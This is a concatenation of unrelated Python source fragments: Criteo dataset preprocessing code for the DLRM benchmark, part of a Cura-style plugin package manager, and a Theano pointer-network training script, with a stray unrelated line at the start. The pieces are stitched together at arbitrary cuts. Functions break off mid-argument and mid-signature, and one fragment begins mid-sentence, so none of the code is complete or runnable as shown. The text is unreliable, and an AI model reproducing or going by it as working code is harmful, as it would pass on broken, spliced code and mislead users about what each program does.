drawCompareCoverageTab( options, sortedstats, sample2repeat )
#sort by totalBases, but
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
# Description: generate inputs and targets for the DLRM benchmark
#
# Utility function(s) to download and pre-process public data sets
# - Criteo Kaggle Display Advertising Challenge Dataset
# https://labs.criteo.com/2014/02/kaggle-display-advertising-challenge-dataset
import os
import sys
from multiprocessing import Manager, Process
import numpy as np
def processCriteoAdData(d_path, d_file, npzfile, i, convertDicts, pre_comp_counts):
# Process Kaggle Display Advertising Challenge or Terabyte Dataset
# by converting unicode strings in X_cat to integers and
# converting negative integer values in X_int.
#
# Loads data in the form "{kaggle|terabyte}_day_i.npz" where i is the day.
#
# Inputs:
# d_path (str): path for {kaggle|terabyte}_day_i.npz files
# i (int): splits in the dataset (typically 0 to 7 or 0 to 24)
# process data if not all files exist
filename_i = npzfile + "_{0}_processed.npz".format(i)
if os.path.exists(filename_i):
print("Using existing " + filename_i, end="\n")
else:
print("Not existing " + filename_i)
with np.load(npzfile + "_{0}.npz".format(i)) as data:
# Approach 2a: using pre-computed dictionaries
X_cat_t = np.zeros(data["X_cat_t"].shape)
for j in range(26):
for k, x in enumerate(data["X_cat_t"][j, :]):
X_cat_t[j, k] = convertDicts[j][x]
# continuous features
X_int = data["X_int"]
X_int[X_int < 0] = 0
# targets
y = data["y"]
np.savez_compressed(
filename_i,
# X_cat = X_cat,
X_cat=np.transpose(X_cat_t), # transpose of the data
X_int=X_int,
y=y,
)
print("Processed " + filename_i, end="\n")
# sanity check (applicable only if counts have been pre-computed & are re-computed)
# for j in range(26):
# if pre_comp_counts[j] != counts[j]:
# sys.exit("ERROR: Sanity check on counts has failed")
# print("\nSanity check on counts passed")
return
def concatCriteoAdData(
d_path,
d_file,
npzfile,
trafile,
days,
data_split,
randomize,
total_per_file,
total_count,
o_filename
):
# Concatenates different days and saves the result.
#
# Inputs:
# days (int): total number of days in the dataset (typically 7 or 24)
# d_path (str): path for {kaggle|terabyte}_day_i.npz files
# o_filename (str): output file name
#
# Output:
# o_file (str): output file path
print("Concatenating multiple days into %s.npz file" % str(d_path + o_filename))
# load and concatenate data
for i in range(days):
filename_i = npzfile + "_{0}_processed.npz".format(i)
with np.load(filename_i) as data:
if i == 0:
X_cat = data["X_cat"]
X_int = data["X_int"]
y = data["y"]
else:
X_cat = np.concatenate((X_cat, data["X_cat"]))
X_int = np.concatenate((X_int, data["X_int"]))
y = np.concatenate((y, data["y"]))
print("Loaded day:", i, "y = 1:", len(y[y == 1]), "y = 0:", len(y[y == 0]))
with np.load(d_path + d_file + "_fea_count.npz") as data:
counts = data["counts"]
print("Loaded counts!")
np.savez_compressed(
d_path + o_filename + ".npz",
X_cat=X_cat,
X_int=X_int,
y=y,
counts=counts,
)
return d_path + o_filename + ".npz"
def getCriteoAdData(
datafile,
o_filename,
max_ind_range=-1,
sub_sample_rate=0.0,
days=7,
data_split='train',
randomize='total',
dataset_multiprocessing=False,
):
# Passes through entire dataset and defines dictionaries for categorical
# features and determines the number of total categories.
#
# Inputs:
# datafile : path to downloaded raw data file
# o_filename (str): saves results under o_filename if filename is not ""
#
# Output:
# o_file (str): output file path
#split the datafile into path and filename
lstr = datafile.split("/")
d_path = "/".join(lstr[0:-1]) + "/"
d_file = lstr[-1].split(".")[0]
npzfile = d_path + ((d_file + "_day"))
trafile = d_path + ((d_file + "_fea"))
# count number of datapoints in training set
total_file = d_path + d_file + "_day_count.npz"
if os.path.exists(total_file):
with np.load(total_file) as data:
total_per_file = list(data["total_per_file"])
total_count = np.sum(total_per_file)
print("Skipping counts per file (already exist)")
else:
total_count = 0
total_per_file = []
# WARNING: The raw data consists of a single train.txt file
# Each line in the file is a sample, consisting of 13 continuous and
# 26 categorical features (an extra space indicates that feature is
# missing and will be interpreted as 0).
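        # For reference, a made-up raw line looks roughly like
        #   0<TAB>1<TAB><TAB>5<TAB>...<TAB>68fd1e64<TAB>...<TAB>8efede7f
        # i.e. <label> TAB 13 integer features TAB 26 hex categorical features,
        # where the empty field (here between "1" and "5") marks a missing value.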
if os.path.exists(datafile):
print("Reading data from path=%s" % (datafile))
with open(str(datafile)) as f:
for _ in f:
total_count += 1
total_per_file.append(total_count)
# reset total per file due to split
num_data_per_split, extras = divmod(total_count, days)
total_per_file = [num_data_per_split] * days
for j in range(extras):
total_per_file[j] += 1
# split into days (simplifies code later on)
file_id = 0
boundary = total_per_file[file_id]
nf = open(npzfile + "_" + str(file_id), "w")
with open(str(datafile)) as f:
for j, line in enumerate(f):
if j == boundary:
nf.close()
file_id += 1
nf = open(npzfile + "_" + str(file_id), "w")
boundary += total_per_file[file_id]
nf.write(line)
nf.close()
else:
sys.exit("ERROR: Criteo Kaggle Display Ad Challenge Dataset path is invalid; please download from https://labs.criteo.com/2014/02/kaggle-display-advertising-challenge-dataset")
# process a file worth of data and reinitialize data
# note that a file may contain a single or multiple splits
def process_one_file(
datfile,
npzfile,
split,
num_data_in_split,
dataset_multiprocessing,
convertDictsDay=None,
resultDay=None
):
if dataset_multiprocessing:
convertDicts_day = [{} for _ in range(26)]
with open(str(datfile)) as f:
y = np.zeros(num_data_in_split, dtype="i4") # 4 byte int
X_int = np.zeros((num_data_in_split, 13), dtype="i4") # 4 byte int
X_cat = np.zeros((num_data_in_split, 26), dtype="i4") # 4 byte int
if sub_sample_rate == 0.0:
rand_u = 1.0
else:
rand_u = np.random.uniform(low=0.0, high=1.0, size=num_data_in_split)
i = 0
percent = 0
for k, line in enumerate(f):
# process a line (data point)
line = line.split('\t')
# set missing values to zero
for j in range(len(line)):
if (line[j] == '') or (line[j] == '\n'):
line[j] = '0'
# sub-sample data by dropping zero targets, if needed
target = np.int32(line[0])
if target == 0 and \
(rand_u if sub_sample_rate == 0.0 else rand_u[k]) < sub_sample_rate:
continue
y[i] = target
X_int[i] = np.array(line[1:14], dtype=np.int32)
if max_ind_range > 0:
X_cat[i] = np.array(
list(map(lambda x: int(x, 16) % max_ind_range, line[14:])),
dtype=np.int32
)
else:
X_cat[i] = np.array(
list(map(lambda x: int(x, 16), line[14:])),
dtype=np.int32
)
# count uniques
if dataset_multiprocessing:
for j in range(26):
convertDicts_day[j][X_cat[i][j]] = 1
# debug prints
if float(i)/num_data_in_split*100 > percent+1:
percent = int(float(i)/num_data_in_split*100)
print(
"Load %d/%d (%d%%) Split: %d Label True: %d Stored: %d"
% (
i,
num_data_in_split,
percent,
split,
target,
y[i],
),
end="\n",
)
else:
for j in range(26):
convertDicts[j][X_cat[i][j]] = 1
# debug prints
print(
"Load %d/%d Split: %d Label True: %d Stored: %d"
% (
i,
num_data_in_split,
split,
target,
y[i],
),
end="\r",
)
i += 1
# store num_data_in_split samples or extras at the end of file
# count uniques
# X_cat_t = np.transpose(X_cat)
# for j in range(26):
# for x in X_cat_t[j,:]:
# convertDicts[j][x] = 1
# store parsed
filename_s = npzfile + "_{0}.npz".format(split)
if os.path.exists(filename_s):
print("\nSkip existing " + filename_s)
else:
np.savez_compressed(
filename_s,
X_int=X_int[0:i, :],
# X_cat=X_cat[0:i, :],
X_cat_t=np.transpose(X_cat[0:i, :]), # transpose of the data
y=y[0:i],
)
print("\nSaved " + npzfile + "_{0}.npz!".format(split))
if dataset_multiprocessing:
resultDay[split] = i
convertDictsDay[split] = convertDicts_day
return
else:
return i
# create all splits (reuse existing files if possible)
recreate_flag = False
convertDicts = [{} for _ in range(26)]
# WARNING: to get reproducible sub-sampling results you must reset the seed below
# np.random.seed(123)
# in this case there is a single split in each day
for i in range(days):
npzfile_i = npzfile + "_{0}.npz".format(i)
npzfile_p = npzfile + "_{0}_processed.npz".format(i)
if os.path.exists(npzfile_i):
print("Skip existing " + npzfile_i)
elif os.path.exists(npzfile_p):
print("Skip existing " + npzfile_p)
else:
recreate_flag = True
if recreate_flag:
if dataset_multiprocessing:
resultDay = Manager().dict()
convertDictsDay = Manager().dict()
processes = [Process(target=process_one_file,
name="process_one_file:%i" % i,
args=(npzfile + "_{0}".format(i),
npzfile,
i,
total_per_file[i],
dataset_multiprocessing,
convertDictsDay,
resultDay,
)
) for i in range(0, days)]
for process in processes:
process.start()
for process in processes:
process.join()
for day in range(days):
total_per_file[day] = resultDay[day]
print("Constructing convertDicts Split: {}".format(day))
convertDicts_tmp = convertDictsDay[day]
for i in range(26):
for j in convertDicts_tmp[i]:
convertDicts[i][j] = 1
else:
for i in range(days):
total_per_file[i] = process_one_file(
npzfile + "_{0}".format(i),
npzfile,
i,
total_per_file[i],
dataset_multiprocessing,
)
# report and save total into a file
total_count = np.sum(total_per_file)
if not os.path.exists(total_file):
np.savez_compressed(total_file, total_per_file=total_per_file)
print("Total number of samples:", total_count)
print("Divided into days/splits:\n", total_per_file)
# dictionary files
counts = np.zeros(26, dtype=np.int32)
if recreate_flag:
# create dictionaries
for j in range(26):
for i, x in enumerate(convertDicts[j]):
convertDicts[j][x] = i
dict_file_j = d_path + d_file + "_fea_dict_{0}.npz".format(j)
if not os.path.exists(dict_file_j):
np.savez_compressed(
dict_file_j,
be removed, then the package is being updated and it should be listed.
if self._to_install_package_dict.keys():
all_installed_ids = all_installed_ids.union(set(self._to_install_package_dict.keys()))
return all_installed_ids
## Get a list of tuples that contain the package ID and version.
# Used by the Marketplace to check which packages have updates available.
def getAllInstalledPackageIdsAndVersions(self) -> List[Tuple[str, str]]:
package_ids_and_versions = [] # type: List[Tuple[str, str]]
all_installed_ids = self.getAllInstalledPackageIDs()
for package_id in all_installed_ids:
package_info = self.getInstalledPackageInfo(package_id)
if package_info is None:
continue
if "package_version" not in package_info:
continue
package_ids_and_versions.append((package_id, package_info["package_version"]))
return package_ids_and_versions
def getAllInstalledPackagesInfo(self) -> Dict[str, List[Dict[str, Any]]]:
all_installed_ids = self.getAllInstalledPackageIDs()
# map of <package_type> -> <package_id> -> <package_info>
installed_packages_dict = {} # type: Dict[str, List[Dict[str, Any]]]
for package_id in all_installed_ids:
# Skip required plugins as they should not be tampered with
if package_id in self._application.getRequiredPlugins():
continue
package_info = self.getInstalledPackageInfo(package_id)
if package_info is None:
continue
# If there is not a section in the dict for this type, add it
if package_info["package_type"] not in installed_packages_dict:
installed_packages_dict[package_info["package_type"]] = []
# Finally, add the data
installed_packages_dict[package_info["package_type"]].append(package_info)
return installed_packages_dict
def getToRemovePackageIDs(self) -> Set[str]:
return self._to_remove_package_set
# Checks if the given package is installed (at all).
def isPackageInstalled(self, package_id: str) -> bool:
return self.getInstalledPackageInfo(package_id) is not None
# This is called by drag-and-dropping curapackage files.
@pyqtSlot(QUrl)
def installPackageViaDragAndDrop(self, file_url: str) -> None:
filename = QUrl(file_url).toLocalFile()
return self.installPackage(filename)
# Schedules the given package file to be installed upon the next start.
@pyqtSlot(str)
def installPackage(self, filename: str) -> None:
has_changes = False
package_id = ""
try:
# Get package information
package_info = self.getPackageInfo(filename)
if not package_info:
return
package_id = package_info["package_id"]
# If the package is being installed but it is in the to-remove list, remove it from that list.
if package_id in self._to_remove_package_set:
self._to_remove_package_set.remove(package_id)
# We do not check if the same package has been installed already here because, for example, in Cura,
# it may need to install a package with the same package-version but with a higher SDK version. So,
# the package-version is not the only version that can be in play here.
# Need to use the lock file to prevent concurrent I/O issues.
with self._container_registry.lockFile():
Logger.log("i", "Package [%s] version [%s] is scheduled to be installed.",
package_id, package_info["package_version"])
# Copy the file to cache dir so we don't need to rely on the original file to be present
package_cache_dir = os.path.join(os.path.abspath(Resources.getCacheStoragePath()), "cura_packages")
if not os.path.exists(package_cache_dir):
os.makedirs(package_cache_dir, exist_ok=True)
target_file_path = os.path.join(package_cache_dir, package_id + ".curapackage")
shutil.copy2(filename, target_file_path)
self._to_install_package_dict[package_id] = {"package_info": package_info,
"filename": target_file_path}
has_changes = True
except:
Logger.logException("c", "Failed to install package file '%s'", filename)
finally:
self._saveManagementData()
if has_changes:
self.installedPackagesChanged.emit()
if package_id in self._packages_with_update_available:
# After installing the update, the check will report that no other updates are available.
# In that case we remove it from the list. This is actually a safe check (could be removed)
if not self.checkIfPackageCanUpdate(package_id):
# The install ensured that the package no longer has a valid update option.
self._packages_with_update_available.remove(package_id)
self.packagesWithUpdateChanged.emit()
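    # Illustrative usage of installPackage() above (not from the original code;
    # assumes `manager` is an instance of this package-manager class and the
    # .curapackage path exists):
    #   manager.installPackage("/path/to/MyPlugin.curapackage")
    # The file is copied to the cache dir and extracted/registered on the next
    # application start.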
# Schedules the given package to be removed upon the next start.
# \param package_id id of the package
# \param force_add is used when updating. In that case you actually want to uninstall & install
@pyqtSlot(str)
def removePackage(self, package_id: str, force_add: bool = False) -> None:
# Check the delayed installation and removal lists first
if not self.isPackageInstalled(package_id):
Logger.log("i", "Attempt to remove package [%s] that is not installed, do nothing.", package_id)
return
# Extra safety check
if package_id not in self._installed_package_dict and package_id in self._bundled_package_dict:
Logger.log("i", "Not uninstalling [%s] because it is a bundled package.")
return
if package_id not in self._to_install_package_dict or force_add:
# Schedule for a delayed removal:
self._to_remove_package_set.add(package_id)
else:
if package_id in self._to_install_package_dict:
# Remove from the delayed installation list if present
del self._to_install_package_dict[package_id]
self._saveManagementData()
self.installedPackagesChanged.emit()
# It might be that a certain update is suddenly available again!
if self.checkIfPackageCanUpdate(package_id):
self._packages_with_update_available.add(package_id)
self.packagesWithUpdateChanged.emit()
## Is the package a user-installed package?
def isUserInstalledPackage(self, package_id: str) -> bool:
return package_id in self._installed_package_dict
# Removes everything associated with the given package ID.
def _purgePackage(self, package_id: str) -> None:
# Iterate through all directories in the data storage directory and look for sub-directories that belong to
# the package we need to remove, that is the sub-dirs with the package_id as names, and remove all those dirs.
data_storage_dir = os.path.abspath(Resources.getDataStoragePath())
for root, dir_names, _ in os.walk(data_storage_dir):
for dir_name in dir_names:
package_dir = os.path.join(root, dir_name, package_id)
if os.path.exists(package_dir):
Logger.log("i", "Removing '%s' for package [%s]", package_dir, package_id)
shutil.rmtree(package_dir)
break
# Installs all files associated with the given package.
def _installPackage(self, installation_package_data: Dict[str, Any]) -> None:
package_info = installation_package_data["package_info"]
filename = installation_package_data["filename"]
package_id = package_info["package_id"]
Logger.log("i", "Installing package [%s] from file [%s]", package_id, filename)
# Load the cached package file and extract all contents to a temporary directory
if not os.path.exists(filename):
Logger.log("w", "Package [%s] file '%s' is missing, cannot install this package", package_id, filename)
return
try:
with zipfile.ZipFile(filename, "r") as archive:
temp_dir = tempfile.TemporaryDirectory()
archive.extractall(temp_dir.name)
except Exception:
Logger.logException("e", "Failed to install package from file [%s]", filename)
return
# Remove it first and then install
try:
self._purgePackage(package_id)
except Exception as e:
message = Message(catalog.i18nc("@error:update",
"There was an error uninstalling the package {package} before installing "
"new version:\n{error}.\nPlease try to upgrade again later.".format(
package = package_id, error = str(e))),
title = catalog.i18nc("@info:title", "Updating error"))
message.show()
return
# Copy the folders there
for sub_dir_name, installation_root_dir in self._installation_dirs_dict.items():
src_dir_path = os.path.join(temp_dir.name, "files", sub_dir_name)
dst_dir_path = os.path.join(installation_root_dir, package_id)
if not os.path.exists(src_dir_path):
Logger.log("w", "The path %s does not exist, so not installing the files", src_dir_path)
continue
self.__installPackageFiles(package_id, src_dir_path, dst_dir_path)
# Remove the file
try:
os.remove(filename)
except Exception:
Logger.log("w", "Tried to delete file [%s], but it failed", filename)
# Move the info to the installed list of packages only when it succeeds
self._installed_package_dict[package_id] = self._to_install_package_dict[package_id]
self._installed_package_dict[package_id]["package_info"]["is_installed"] = True
def __installPackageFiles(self, package_id: str, src_dir: str, dst_dir: str) -> None:
Logger.log("i", "Moving package {package_id} from {src_dir} to {dst_dir}".format(package_id=package_id, src_dir=src_dir, dst_dir=dst_dir))
try:
shutil.move(src_dir, dst_dir)
except FileExistsError:
Logger.log("w", "Not moving %s to %s as the destination already exists", src_dir, dst_dir)
# Gets package information from the given file.
def getPackageInfo(self, filename: str) -> Dict[str, Any]:
package_json = {} # type: Dict[str, Any]
try:
with zipfile.ZipFile(filename) as archive:
# Go through all the files and use the first successful read as the result
for file_info in archive.infolist():
if file_info.filename.endswith("package.json"):
Logger.log("d", "Found potential package.json file '%s'", file_info.filename)
try:
with archive.open(file_info.filename, "r") as f:
package_json = json.loads(f.read().decode("utf-8"))
# Add by default properties
package_json["is_active"] = True
package_json["is_bundled"] = False
package_json["is_installed"] = False
break
except:
Logger.logException("e", "Failed to load potential package.json file '%s' as text file.",
file_info.filename)
except zipfile.BadZipFile:
Logger.logException("e", "Failed to unpack the file %s", filename)
return package_json
# Gets the license file content if present in the given package file.
# Returns None if there is no license file found.
def getPackageLicense(self, filename: str) -> Optional[str]:
license_string = None
def is_license(zipinfo: zipfile.ZipInfo) -> bool:
return os.path.basename(zipinfo.filename).startswith("LICENSE")
with zipfile.ZipFile(filename) as archive:
# Go through all the files and use the first successful read as the result
license_files = sorted(filter(is_license, archive.infolist()), key = lambda x: len(x.filename)) # Find the one with the shortest path.
for file_info in license_files:
Logger.log("d", "Found potential license file '{filename}'".format(filename = file_info.filename))
try:
with archive.open(file_info.filename, "r") as f:
data = f.read()
license_string = data.decode("utf-8")
break
except:
Logger.logException("e", "Failed to load potential license file '%s' as text file.", file_info.filename)
license_string = None
return license_string
## Find the package files by package_id by looking at the installed folder
@staticmethod
def getPackageFiles(package_id) -> List[Tuple[str, List[str]]]:
data_storage_dir = os.path.abspath(Resources.getDataStoragePath())
os_walk = []
dirs_to_check = []
result = [] # 2-tuples of (dir, file_names)
for root_path, dir_names, file_names in os.walk(data_storage_dir):
os_walk.append((root_path, dir_names, file_names))
for dir_name in dir_names:
package_dir = os.path.join(root_path, dir_name, package_id)
if os.path.exists(package_dir):
dirs_to_check.append(package_dir)
for root_path, dir_names, file_names in os_walk:
for dir_to_check in dirs_to_check:
if root_path.startswith(dir_to_check):
result.append((root_path, file_names))
return result
## Return container ids for contents found with package_id
@staticmethod
def getPackageContainerIds(package_id: str)
<filename>theano/ptrnets.py
from collections import OrderedDict
import cPickle as pkl
import sys
import time
import argparse
import random
import numpy
import theano
from theano import config
import theano.tensor as tensor
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from shapely.geometry.polygon import Polygon
import data_utils
datasets = {
'tsp': (data_utils.load_data, data_utils.prepare_data), # TSP
'ch': (data_utils.load_data, data_utils.prepare_data) # Convex Hull
}
# Set the random number generators' seeds for consistency
SEED = 123
numpy.random.seed(SEED)
def numpy_floatX(data):
return numpy.asarray(data, dtype=config.floatX)
def get_minibatches_idx(n, minibatch_size, shuffle=False):
"""
Split the indices 0..n-1 into minibatches of size minibatch_size; used to reshuffle the dataset at each iteration.
"""
idx_list = numpy.arange(n, dtype="int32")
if shuffle:
numpy.random.shuffle(idx_list)
minibatches = []
minibatch_start = 0
for i in range(n // minibatch_size):
minibatches.append(idx_list[minibatch_start:minibatch_start + minibatch_size])
minibatch_start += minibatch_size
if minibatch_start != n:
# Make a minibatch out of what is left
minibatches.append(idx_list[minibatch_start:])
return zip(range(len(minibatches)), minibatches)
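# Illustrative sketch (not part of the original model): with made-up sizes,
# get_minibatches_idx(5, 2, shuffle=False) returns
#   [(0, array([0, 1])), (1, array([2, 3])), (2, array([4]))]
# i.e. the last minibatch collects the leftover indices.
def _example_minibatches():
    return list(get_minibatches_idx(5, 2, shuffle=False))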
def zipp(params, tparams):
"""
Push the numpy parameter values into the corresponding Theano shared variables (needed when reloading a model, since the shared variables may live on the GPU).
"""
for kk, vv in params.iteritems():
tparams[kk].set_value(vv)
def unzip(zipped):
"""
Pull the parameter values out of the Theano shared variables into a plain OrderedDict (needed when pickling the model, since the shared variables may live on the GPU).
"""
new_params = OrderedDict()
for kk, vv in zipped.iteritems():
new_params[kk] = vv.get_value()
return new_params
def dropout_layer(state_before, use_noise, trng):
proj = tensor.switch(use_noise,
(state_before *
trng.binomial(state_before.shape,
p=0.5, n=1,
dtype=state_before.dtype)),
state_before * 0.5)
return proj
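# Illustrative sketch (not part of the original model): dropout_layer above
# multiplies activations by a Bernoulli(0.5) mask when use_noise is on and by
# the fixed factor 0.5 otherwise, so the expected activation is the same in
# both modes. The numpy check below (with made-up sizes) demonstrates this.
def _example_dropout_expectation(n_trials=20000, dim=4):
    rng = numpy.random.RandomState(0)
    x = numpy.ones(dim)
    train_mean = numpy.mean(
        [x * rng.binomial(n=1, p=0.5, size=dim) for _ in range(n_trials)],
        axis=0)
    test_out = x * 0.5
    return train_mean, test_out  # train_mean is close to test_out (~0.5 each)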
def get_dataset(name):
return datasets[name][0], datasets[name][1]
def _p(pp, name):
return '%s_%s' % (pp, name)
def _pd(pp, name, ix):
return '%s_%s_%s' % (pp, name, ix)
def rand_weight(ndim, ddim, lo, hi):
randn = numpy.random.rand(ndim, ddim)
randn = randn * (hi - lo) + lo
return randn.astype(config.floatX)
def ortho_weight(ndim):
W = numpy.random.randn(ndim, ndim)
u, s, v = numpy.linalg.svd(W)
return u.astype(config.floatX)
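# Illustrative sketch (not part of the original model): ortho_weight above keeps
# the left singular vectors of a random Gaussian matrix, which form an
# orthogonal square matrix. The check below, with a made-up size, verifies that
# W.dot(W.T) is close to the identity (up to floating-point round-off).
def _example_ortho_weight_check(ndim=8):
    W = ortho_weight(ndim)
    return numpy.abs(W.dot(W.T) - numpy.eye(ndim, dtype=W.dtype)).max()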
def init_params(options):
params = OrderedDict()
# lstm gates parameters
W = numpy.concatenate([rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08)], axis=1)
params['lstm_en_W'] = W
U = numpy.concatenate([rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08)], axis=1)
params['lstm_en_U'] = U
b = numpy.zeros((4 * options['dim_proj'],))
params['lstm_en_b'] = b.astype(config.floatX)
W = numpy.concatenate([rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08)], axis=1)
params['lstm_de_W'] = W
U = numpy.concatenate([rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08)], axis=1)
params['lstm_de_U'] = U
b = numpy.zeros((4 * options['dim_proj'],))
params['lstm_de_b'] = b.astype(config.floatX)
params['lstm_hterm'] = rand_weight(options['dim_proj'], 1, -0.08, 0.08)[:, 0]
# ptr parameters
params['ptr_W1'] = rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08)
params['ptr_W2'] = rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08)
params['ptr_v'] = rand_weight(options['dim_proj'], 1, -0.08, 0.08)[:, 0]
return params
def load_params(path, params):
pp = numpy.load(path)
for kk, vv in params.iteritems():
if kk not in pp:
raise Warning('%s is not in the archive' % kk)
params[kk] = pp[kk]
return params
def init_tparams(params):
tparams = OrderedDict()
for kk, pp in params.iteritems():
tparams[kk] = theano.shared(params[kk], name=kk)
return tparams
def sgd(lr, tparams, grads, p, p_mask, x, x_mask, y, y_mask, cost):
""" Stochastic Gradient Descent
:note: A more complicated version of sgd than needed. It is
structured this way to mirror the adadelta and rmsprop interfaces.
"""
# New set of shared variable that will contain the gradient
# for a mini-batch.
gshared = [theano.shared(v.get_value() * 0., name='%s_grad' % k)
for k, v in tparams.iteritems()]
gsup = [(gs, g) for gs, g in zip(gshared, grads)]
# Function that computes gradients for a mini-batch, but does not
# update the weights.
f_grad_shared = theano.function([p, p_mask, x, x_mask, y, y_mask], cost, updates=gsup,
name='sgd_f_grad_shared')
pup = [(v, v - lr * g) for v, g in zip(tparams.values(), gshared)]
# Function that updates the weights from the previously computed
# gradient.
f_update = theano.function([lr], [], updates=pup, name='sgd_f_update')
return f_grad_shared, f_update
def rmsprop(lr, tparams, grads, p, p_mask, x, x_mask, y, y_mask, cost):
zipped_grads = [theano.shared(q.get_value() * numpy_floatX(0.), name='%s_grad' % k)
for k, q in tparams.iteritems()]
running_grads = [theano.shared(q.get_value() * numpy_floatX(0.), name='%s_rgrad' % k)
for k, q in tparams.iteritems()]
running_grads2 = [theano.shared(q.get_value() * numpy_floatX(0.), name='%s_rgrad2' % k)
for k, q in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rgup = [(rg, 0.95 * rg + 0.05 * g) for rg, g in zip(running_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2))
for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function([p, p_mask, x, x_mask, y, y_mask], cost,
updates=zgup + rgup + rg2up,
name='rmsprop_f_grad_shared')
updir = [theano.shared(q.get_value() * numpy_floatX(0.), name='%s_updir' % k)
for k, q in tparams.iteritems()]
updir_new = [(ud, 0.9 * ud - 1e-4 * zg / tensor.sqrt(rg2 - rg ** 2 + 1e-4))
for ud, zg, rg, rg2 in zip(updir, zipped_grads, running_grads,
running_grads2)]
param_up = [(q, q + udn[1])
for q, udn in zip(tparams.values(), updir_new)]
f_update = theano.function([lr], [], updates=updir_new + param_up,
on_unused_input='ignore',
name='rmsprop_f_update')
return f_grad_shared, f_update
def adadelta(lr, tparams, grads, p, p_mask, x, x_mask, y, y_mask, cost):
zipped_grads = [theano.shared(q.get_value() * numpy_floatX(0.), name='%s_grad' % k)
for k, q in tparams.iteritems()]
running_up2 = [theano.shared(q.get_value() * numpy_floatX(0.),name='%s_rup2' % k)
for k, q in tparams.iteritems()]
running_grads2 = [theano.shared(q.get_value() * numpy_floatX(0.),name='%s_rgrad2' % k)
for k, q in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2))
for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function([p, p_mask, x, x_mask, y, y_mask], cost, updates=zgup + rg2up,
name='adadelta_f_grad_shared')
updir = [-tensor.sqrt(ru2 + 1e-6) / tensor.sqrt(rg2 + 1e-6) * zg
for zg, ru2, rg2 in zip(zipped_grads, running_up2, running_grads2)]
ru2up = [(ru2, 0.95 * ru2 + 0.05 * (ud ** 2))
for ru2, ud in zip(running_up2, updir)]
param_up = [(q, q + ud) for q, ud in zip(tparams.values(), updir)]
f_update = theano.function([lr], [], updates=ru2up + param_up,
on_unused_input='ignore',
name='adadelta_f_update')
return f_grad_shared, f_update
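# For reference, the updates assembled in adadelta() above implement the
# standard AdaDelta rule with decay 0.95 and epsilon 1e-6:
#   E[g^2]_t   = 0.95 * E[g^2]_{t-1}   + 0.05 * g_t^2
#   dx_t       = -sqrt(E[dx^2]_{t-1} + 1e-6) / sqrt(E[g^2]_t + 1e-6) * g_t
#   E[dx^2]_t  = 0.95 * E[dx^2]_{t-1}  + 0.05 * dx_t^2
#   param_t    = param_{t-1} + dx_t
# (the learning-rate argument is kept for interface compatibility but is unused).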
def ptr_network(tparams, p, p_mask, x, x_mask, xi, xi_mask, hidi, celi, hids, options):
n_sizes = p.shape[0]
n_samples = p.shape[1] if p.ndim == 3 else 1
n_steps = x.shape[0]
beam_width = xi.shape[0]
assert p_mask is not None
assert x_mask is not None
assert xi_mask is not None
def _slice(_x, n, dim):
if _x.ndim == 3:
return _x[:, :, n * dim:(n + 1) * dim]
if _x.ndim == 2:
return _x[:, n * dim:(n + 1) * dim]
return _x[n * dim:(n + 1) * dim]
def softmax(m_, x_):
maxes = tensor.max(x_, axis=0, keepdims=True)
e = tensor.exp(x_ - maxes)
dist = e / tensor.sum(e * m_, axis=0)
return dist
def _lstm(m_, x_, h_, c_, prefix='lstm_en'):
preact = tensor.dot(x_, tparams[_p(prefix, 'W')]) + tparams[_p(prefix, 'b')]
preact += tensor.dot(h_, tparams[_p(prefix, 'U')])
i = tensor.nnet.sigmoid(_slice(preact, 0, options['dim_proj']))
f = tensor.nnet.sigmoid(_slice(preact, 1, options['dim_proj']))
o = tensor.nnet.sigmoid(_slice(preact, 2, options['dim_proj']))
c = tensor.tanh(_slice(preact, 3, options['dim_proj']))
c = f * c_ + i * c
c = m_[:, None] * c + (1. - m_)[:, None] * c_
h = o * tensor.tanh(c)
h = m_[:, None] * h + (1. - m_)[:, None] * h_
return h, c
def _ptr_probs(xm_, x_, h_, c_, _, hprevs, hprevs_m):
xemb = p[x_, tensor.arange(n_samples), :] # n_samples * dim_proj
h, c = _lstm(xm_, xemb, h_, c_, 'lstm_de')
u = tensor.dot(hprevs, tparams['ptr_W1']) + tensor.dot(h, tparams['ptr_W2']) # n_steps * n_samples * dim
u = tensor.tanh(u) # n_sizes * n_samples * dim_proj
u = tensor.dot(u, tparams['ptr_v']) # n_sizes * n_samples
# prob = tensor.nnet.softmax(u.T).T # n_sizes * n_samples
prob = softmax(hprevs_m, u)
return h, c, prob
# encoding
# we add a blank header to p and p_mask, so a pointer to the blank header means pointing to the termination mark
# see data_utils.prepare_data for more details
ones = tensor.ones((n_samples,), dtype=p.dtype)
h0 = tensor.outer(ones, tparams['lstm_hterm']) # n_samples * dim_proj; T.tile doesn't work on non-constant reps
c0 = tensor.alloc(numpy_floatX(0.), n_samples, options['dim_proj'])
rval, _ = theano.scan(_lstm,
sequences=[p_mask, p],
